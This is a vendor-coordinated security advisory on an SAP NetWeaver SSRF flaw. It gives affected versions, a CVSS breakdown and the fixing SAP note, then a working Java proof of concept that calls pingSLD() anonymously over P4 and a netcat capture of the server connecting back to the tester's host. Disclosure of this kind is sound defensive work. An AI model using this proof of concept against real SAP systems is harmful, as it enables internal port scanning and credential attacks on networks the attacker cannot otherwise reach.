[ERPSCAN-18-003] SAP Java P4 SLD SSRF
Application: SAP NetWeaver
Versions Affected: SAP Netweaver 7.4, 7.5
Vendor URL: SAP
Bug: SSRF
Reported: 05.10.2017
Vendor response: 06.10.2017
Date of Public Advisory: 13.02.2018
Reference: SAP Security Note 2565622
Author: Mathieu Geli (ERPScan)
VULNERABILITY INFORMATION
Class: Missing Authentication Check
Risk: Medium
Impact: Read, modify or delete sensitive information
Remotely Exploitable: Yes
Locally Exploitable: No
CVSS Information
CVSS v3 Base Score: 8.3 / 10
CVSS Base v3 Base Vector:
DESCRIPTION
An attacker can force the SAP server to send an SLD query to any internal servers.
AV: Attack Vector (Related exploit range) | Network (N) |
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed (C) |
C: Impact to Confidentiality | Low (L) |
I: Impact to Integrity | Low (L) |
A: Impact to Availability | Low (L) |
BUSINESS RISK
An attacker can use a Server Side Request Forgery vulnerability to gain an access to the internal server which is not accessible directly to the attacker.
VULNERABLE PACKAGES
SAP Netweaver 7.4, 7.5
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2565622
TECHNICAL DESCRIPTION
While connecting to Java bean SLDJAVA_ACCESSOR_REQUEST via P4 protocol, we have noticed that the method pingSLD() of the class AbapSLDRequest is available to the J2EE_GUEST user (identity taken by an anonymous network user connected to the J2EE engine).
This method has the following prototype: .pingSLD(String host, Integer port, String user, String pass) and connects to the specified host with specified port and passing user:pass has HTTP Basic authentication. The anonymous network client controls all those parameters. It means that it is possible to force the server to connect to any internal servers/ports and to port scanning or try to authenticate on legitimate SLD servers.
Proof of Concept
1 2 3 4 |
Object o = ctx.lookup("ejb:/appName=sap.com/tc~sld~abapapi_ear, jarName=sap.com~tc~sld~abapapi_ejb.jar, beanName=SLDJAVA_ACCESSOR_REQUEST, interfaceName=com.sap.lcrabapapi.ejb.AbapSLDRequestHome"); AbapSLDRequestHome a = (AbapSLDRequestHome)PortableRemoteObject.narrow( o, AbapSLDRequestHome.class ); AbapSLDRequest ar = a.create(); ar.pingSLD(host, Integer.parseInt(port), user, pass); |
The result of execution by connecting to the SAP server 172.16.30.29 and asking to connect back to us on port 4444 (our IP is 172.16.2.179) looks like this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
$ nc -v -l -p 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from [172.16.30.29] port 4444 [tcp/*] accepted (family 2, sport 62362) POST /sld/cimom HTTP/1.1 Host: 172.16.2.179:4444 CIMOperation: MethodCall Content-Length: 159 Content-Encoding: deflate CIMProtocolVersion: 1.0 SAP-CIM-Client2: SAP-CIM-Java/7.30.90 SAP-Accepted-Cookie: JSESSIONID Accept: application/octet-stream, application/xml, text/xml Accept-Charset: UTF-8 Authorization: Basic ZmFrZXVzZXI6ZmFrZXBhc3M= CIMMethod: GetClass SAP-PASSPORT: 2A54482A0300E600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006A6176613734352E636F72702E647365632E72755F4A34355F35323034313530346539383533363330336130313030306332666264613833333930373964393100000000024E98536303A01000C2FBDA8339079D9180373FB4609011E79BBB0000004F68B600000001000000002A54482A Content-Type: application/octet-stream CIMObject: sld/active Accept-Encoding: identity, deflate User-Agent: SAP HTTP CLIENT/6.40 x�M�A �0@e0M);�` �,!c~���F��^�Q� �ܟ�\��0:�Q�rx~���TP��vGr�r~�P �I5��=����wTh�tS(&n#�����N%��ཪ� |